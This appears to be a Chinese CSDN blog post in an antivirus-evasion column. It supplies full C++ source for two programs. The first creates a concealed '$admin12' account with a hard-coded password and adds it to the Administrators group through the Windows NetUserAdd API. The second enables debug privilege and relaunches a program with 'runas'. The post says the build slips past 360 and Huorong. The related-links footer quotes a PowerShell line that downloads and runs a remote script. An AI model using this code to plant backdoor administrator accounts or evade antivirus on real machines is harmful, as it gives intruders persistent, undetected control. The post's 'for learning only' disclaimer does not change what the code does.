<免杀>C++使用WindowAPI提升用户权限+创建用户并添加管理员组(过360+火绒)

已于 2022-11-21 11:17:06 修改
阅读量813 收藏 7
点赞数 2
分类专栏: 免杀 渗透工具编写 文章标签: c++ 免杀 添加用户 提权
于 2022-11-21 11:15:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19623861/article/details/127960400
版权

C++使用WindowAPI提升用户权限+创建用户并添加管理员组(过360+火绒)

目录

0x01 验证

使用net user 会被360拦截
在这里插入图片描述
即便不被拦截,也无法添加,本机admin用户是管理员组
在这里插入图片描述
在这里插入图片描述

0x02 添加用户免杀


#include  <stdio.h>  
#include  <windows.h>  
#include  <lm.h>  
#pragma comment(lib,"netapi32")    
int Usage(wchar_t*);
int main(int argc, wchar_t* argv[])
{
	// 定义USER_INFO_1结构体
	USER_INFO_1 ui;
	DWORD dwError = 0;
	ui.usri1_name = (LPWSTR)TEXT("$admin12");            // 账户    
	ui.usri1_password = (LPWSTR)TEXT("Admin12");      // 密码
	ui.usri1_priv = USER_PRIV_USER;
	ui.usri1_home_dir = NULL;
	ui.usri1_comment = NULL;
	ui.usri1_flags = UF_SCRIPT;
	ui.usri1_script_path = NULL;
	//添加名为zzzhhh的用户,密码为p@sswordQq123:    
	if (NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError) == NERR_Success)
	{

		MessageBox(0, L"successfully", L"title", 0);

	}
	else
	{
		//添加失败    
		MessageBox(0, L"fail", L"title", 0);

	}

	// 添加用户到administrators组
	LOCALGROUP_MEMBERS_INFO_3 account;
	account.lgrmi3_domainandname = ui.usri1_name;
	if (NetLocalGroupAddMembers(NULL, L"Administrators", 3, (LPBYTE)&account, 1) == NERR_Success)
	{
		//添加成功    
		MessageBox(0, L"Add to Administrators success", L"title", 0);
	}
	else
	{
		//添加失败    
		MessageBox(0, L"Add to Administrators Fail!", L"title", 0);
	}

	return 0;
}

打包后的文件使用360云查杀会被检测出来,但是火绒不会,静态两者均不会
在这里插入图片描述

单单使用这个程序不会成功,需要第二个提权程序使用
在这里插入图片描述

0x03 提权执行

#include <iostream>
#include <windows.h>
#include <tchar.h>
using namespace std;
//提高自己的权限
/*
 * 这个函数,将进程权限提升成具有调试权限的进程,这个权限应该是进程所能具有的最大权限
 * 前提启动这个进程的账户必须是一个管理员,否则没法提升
*/

//当fEnable = TRUE 的时候,授予当前进程调试权限
//当fEnable = FALSE 的时候,收回调试权限
//当函数返回TRUE的时候说明权限调整成功,否则失败
BOOL EnableDebugPrivilege(BOOL fEnable)
{
    //调试权限可以让该进程能够读取其他进程的信息
    BOOL fok = FALSE;
    HANDLE hToken;//存放获得的令牌

    //获取当前进程的令牌
    /*
     * 这个函数的第一个参数是当前进程的句柄
     * 第二个参数是进程对获得的令牌有哪些操作权限,权限有很多
     * 第三个参数是存放令牌的句柄的地址
     */
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken))
    {
        //开始激活当前令牌的调试权限,调试权限就算有一般也是不开通的,因为权限太大了
        //一定要用完了就关掉

        TOKEN_PRIVILEGES tp;//结构体,表示令牌权限
        /*
         *这个结构体有很多个成员变量,保存在数组里
         *有一个唯一本地标识符 LUID 一个不可能重复的很大的数字,这个东西和GUID是同一个东西
         */

         //只启动调试权限,所以权限的个数是一个
        tp.PrivilegeCount = 1;

        /*
         * 下面一个函数,查找并且获得本地调试权限的LUID,LUID存储在tp结构体里
         * 如果第一个参数是NULL,代表本地的权限的LUID
         */
         //LookupPrivilegeValue函数获得本地系统的调试权限的LUID,还没有给令牌
        LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);

        //下面一句话,在tp.Privilege[0].Attributes属性中,设置是开启这个权限还是关闭这个权限
        tp.Privileges[0].Attributes = fEnable ? SE_PRIVILEGE_ENABLED : 0;
        //当Attributes = SE_PRIVILEGE_ENABLE时,激活权限
        //当Attributes = 0时,关闭权限
        //权限是从上一个函数里获得的

        //AdjustTokenPrivileges函数激活或者关闭tp中给定的权限
        AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);

        //这句话确认激活是否成功
        fok = (GetLastError() == ERROR_SUCCESS);
        CloseHandle(hToken);
    }
    return fok;

}
string GetExePath()
{

    char szFilePath[MAX_PATH + 1] = { 0 };
    GetModuleFileNameA(NULL, szFilePath, MAX_PATH);
    /*
    strrchr:函数功能:查找一个字符c在另一个字符串str中末次出现的位置(也就是从str的右侧开始查找字符c首次出现的位置),
    并返回这个位置的地址。如果未能找到指定字符,那么函数将返回NULL。
    使用这个地址返回从最后一个字符c到str末尾的字符串。
    */
    (strrchr(szFilePath, '\\'))[0] = 0; // 删除文件名,只获得路径字串//
    string path = szFilePath;
    return path;
}
LPCWSTR stringToLPCWSTR(std::string orig)
{
    size_t origsize = orig.length() + 1;
    const size_t newsize = 100;
    size_t convertedChars = 0;
    wchar_t* wcstring = (wchar_t*)malloc(sizeof(wchar_t) * (orig.length() - 1));
    mbstowcs_s(&convertedChars, wcstring, origsize, orig.c_str(), _TRUNCATE);

    return wcstring;
}
//判断管理员权限
bool IsAdmin()
{
    BOOL b;
    SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
    PSID AdministratorsGroup;
    b = AllocateAndInitializeSid(&NtAuthority, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS, 0, 0, 0, 0, 0, 0, &AdministratorsGroup);
    if (b)
    {
        if (!CheckTokenMembership(NULL, AdministratorsGroup, &b))
        {
            b = FALSE;
        }
        FreeSid(AdministratorsGroup);
    }

    return(b);
}
int main(int argc, char* argv[])
{   
    BOOL isadmin = IsAdmin();
    cout << isadmin << endl;
    string str1 = GetExePath()+"\\"+argv[1];
    //string str1 = argv[1];
    LPCWSTR cmd1 = stringToLPCWSTR(str1);
    //提升权限
    if (EnableDebugPrivilege(TRUE))
    {
        wcout << "Enable Debug privilege is ok!" << endl;
    }
    else
    {
        wcout << "Enable Debug privilege is failure!" << endl;
        //以管理员的权限来运行某一个程序
    //这个程序才是我们真正要使用的程序
    //上一个程序是一个中间进程,用户看不到,是程序员申请管理员权限的程序

    }
    SHELLEXECUTEINFO ShExecInfo;
    memset(&ShExecInfo, 0, sizeof(ShExecInfo));//初始化
    ShExecInfo.cbSize = sizeof(ShExecInfo);
    ShExecInfo.hwnd = NULL;
    ShExecInfo.lpVerb = L"runas";//这个参数设置,就是让ShellExectueEx函数驱动进程,不要使用过滤令牌,就是用这个字符串
    ShExecInfo.lpFile = cmd1;//这个就是你要启动的程序,例子就是启动一个cmd黑窗口
    ShExecInfo.lpParameters = L"";
    ShExecInfo.lpDirectory = NULL;
    ShExecInfo.nShow = SW_SHOW;//如果这个参数不设置,你看不见被启动程序的窗口,因为被隐藏了   SW_SHOW
    ShExecInfo.hInstApp = NULL;
    ShellExecuteEx(&ShExecInfo);

    //收回权限
    EnableDebugPrivilege(FALSE);
    return 0;
}

查看静态免杀效果,静态查询过

在这里插入图片描述

运行,添加成功,并是管理员组,无查杀
在这里插入图片描述
在这里插入图片描述

本文仅以学习为目的

我重来不说话
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
绕过360添加用户.mp4
12-05
绕过360添加用户,大家都知道在提权的时候会可能会遇到360.0000000.。。。。。。。。。。。
你需要来自XXX的权限才能对此文件夹进行更改 win10
qq_1773889494的博客
03-22 461
你需要来自XXX的权限才能对此文件夹进行更改 win10 最简单的办法:移动文件夹到C盘ProgramFiles,然后右键删除即可。
记一次绕过安全狗与360艰难提权
XunanSec的博客
06-07 1776
端午短暂休息三天,复工之后朋友又丢给我一个,在打台球途中了解了一下这个奇怪的,说是无法执行命令,经过测试发现只能执行命令,确实奇怪,草草打了几局台球就回去拿起电脑开日菜刀上面写着当前用户为,但是执行任何命令都没有回显,要不是这个可以上传下载浏览文件,我都怀疑这个是假的了难道是禁用了高危函数吗?查看发现也没禁用呀至于这种没有任何回显的,一时间有点不知所措,那么就先翻一下文件吧(这是在没有思路情况下的一种思路) 顺便也可以了解目标机器的环境,是否存在杀软,是否宝塔面板搭建的等等......每一个环境都有每一种思
CS免杀
anwen12的博客
02-06 4907
Cobaltstrike 一、基础使用 ./teamserver 192.168.43.224 123456 启动服务器端 在windows下的链接 双击bat文件即可 在linux下 ./start.sh 让目标机器链接上teamserver 1.设置好监听器 2.生成攻击载荷 url它是个文件路径,就是让目标(受害者)通过地址下载恶意脚本 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring
绕过360 添加用户
记事本
07-28 4440
//Code by Pnig0s1992 //Date:2012,3,17 #include #include #include #pragma comment(lib,"Netapi32.lib") int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR l
c++获取system权限代码
03-09
程序运行有时需要更高的权限做更多的事情,本代码就是让c++程序获取system权限的代码
Windows编程-提升进程权限,以管理权限启动另一个程序
NINE_world的博客
10-04 1218
#include <iostream> #include <windows.h> #include <tchar.h> using namespace std; //提高自己的权限 /* * 这个函数,将进程权限提升成具有调试权限的进程,这个权限应该是进程所能具有的最大权限 * 前提启动这个进程的账户必须是一个管理员,否则没法提升 */ //当fEnable = TRUE 的时候,授予当前进程调试权限 //当fEnable = FALSE 的时候,收回调试权限 //
提升进程权限-OpenProcessToken等函数的用法
stonesharp的专栏
07-02 1万+
提升进程权限 文章一: 在枚举/结束系统进程或操作系统服务时,会出现自己权限不足而失败的情况,这时就需要提升自己进程到系统权限,其实提升权限的代码很简单的,看到过的最经典的应该是《WINDOWS核心编程》第四章中操作进程给出的那个函数了,如果我们真的不了解它的操作也不要紧,因为只要在你需要的地方调用下面这个函数就是了,以下是它的代码:   BOOL EnablePriv() { HAN
【总结】用户权限设置和进程权限提升
热门推荐
华秋实的专栏
11-29 2万+
使用某些Windows API的时候需要提升进程的默认权限,例如RegRestoreKey需要SE_RESTORE_NAME 和SE_BACKUP_NAME 权限。在这种情况下,我们需要使用到一Windows API提升进程权限。需要的函数有: 1.OpenProcessToken 2.LookupPrivilegeValue 3.AdjustTokenPrivileges 使用
关闭进程时的权限问题,一个例子。
asb2010的专栏
01-23 515
OpenProcessToken() LookupPrivilegeValue() AdjustTokenPrivileges() 主要是这三个函数,第一个函数取得要提升权限的进程的令牌标识。 第二个函数找到提升某个权限的LUID 。  此值作为AdjustTokenPrivileges函数第三个参数的一个属性。 TOKEN_PRIVILEGES  该结构体是将你要指定提升的权限数
基于python pyd的shellcode免杀绕过+源代码+文档说明
12-01
根据目前的测试效果,可以绕过360火绒。 -------- 该资源内项目源码是个人的毕设,代码都测试ok,都是运行成功后才上传资源,答辩评审平均分达到96分,放心下载使用! <项目介绍> 1、该资源内项目代码都经过测试...
一款基于python的shellcode免杀加载器+源代码+文档说明
12-01
- 2023-10-25:病毒库更新至最新的火绒360动态可过,windows defender静态可过 - 2023-11-02:evilhiding v1.1更新,能绕过火绒360,defender -------- 该资源内项目源码是个人的毕设,代码都测试ok,都是运行...
火绒终端安全管理系统V2.0安装部署手册
08-19
火绒终端安全管理系统V2.0安装部署手册
用python制作免杀软件教程及工具.zip
07-26
本资源会教你如何用python制作免杀软件,并提供了所需的代码工具和脚本,亲测能够过360安全卫士和火绒
火绒右键管理助手——Windows可用
01-18
火绒右键管理,免安装 从火绒安全管家提取出来的 火绒安全 https://www.huorong.cn/
C++ 获得管理员权限 以管理员身份运行程序
CarlGao4的博客
01-15 1万+
很多时候,我们需要程序获得管理员权限,以便进行一些需要更高权限的操作(比如修改Program Files里面的文件、系统操作等)。相信已经有不少人已经知道在项目设置里面要求程序必须以管理员身份启动,但有些功能还是可以在非管理员状态下执行的,我们希望在需要的时候再获取到管理员权限。有时普通用户也无法提供管理员权限,我们要想让程序也能运行,这时该怎么办呢?
绕过360给目标机器添加账户
最新发布
weixin_65550121的博客
12-07 1093
Beacon 对象文件 (BOF) 是一个已编译的 C 程序,按照约定编写,允许其在 Beacon 进程内执行并使用内部 Beacon API。在BOF中我们是可以通过GetProcAddress,LoadLibraryA,GetModuleHandle 来调用我们想要的windows API。它们在 Beacon 进程内部运行,并且可以使用进程注入块中的可延展的 c2 配置文件来控制内存。其实go函数就是BOF的入口,当你在CS上执行inline-execute命令的时候,就会调用go函数。
Windows服务器SYSTEM权限Webshell无法添加管理账户情况突破总结
weixin_34267123的博客
03-16 888
Webshell有了SYSTEM权限,却无法成功添加administrators用户,因此导致无法成功连接3389。总结原因有以下几点:I.杀软篇1,360杀毒软件2,麦咖啡杀毒软件3,卡巴斯基杀毒软件4,其他杀毒软件或防护软件II.策略篇1,3389端口变更2,莫名其妙无法添加账户3,管理员限制篇4,系统已达最大连接数处理-----------------------I. ...
SeDebugPrivilege
积累点滴,保持自我
04-10 6211
要对一个任意进程(包括系统安全进程和服务进程)进行指定了写相关的访问权的OpenProcess操作, 只要当前进程具有SeDeDebug权限就可以了。 要是一个用户Administrator或是被给予了相应的权限, 就可以具有该权限。 可是,就算我们用Administrator帐号对一个系统安全进程执行OpenProcess(PROCESS_ALL_ACCESS,FALSE,     d
kali木马免杀火绒
10-07
3. 使用免杀工具:kali系统中有一些专门用于木马免杀的工具,您可以尝试使用这些工具来生成免杀的木马程序。例如,您可以使用powerstager等工具来生成免杀的木马,然后再进行火绒的测试。 总之,木马免杀是一个不断...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

我重来不说话

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值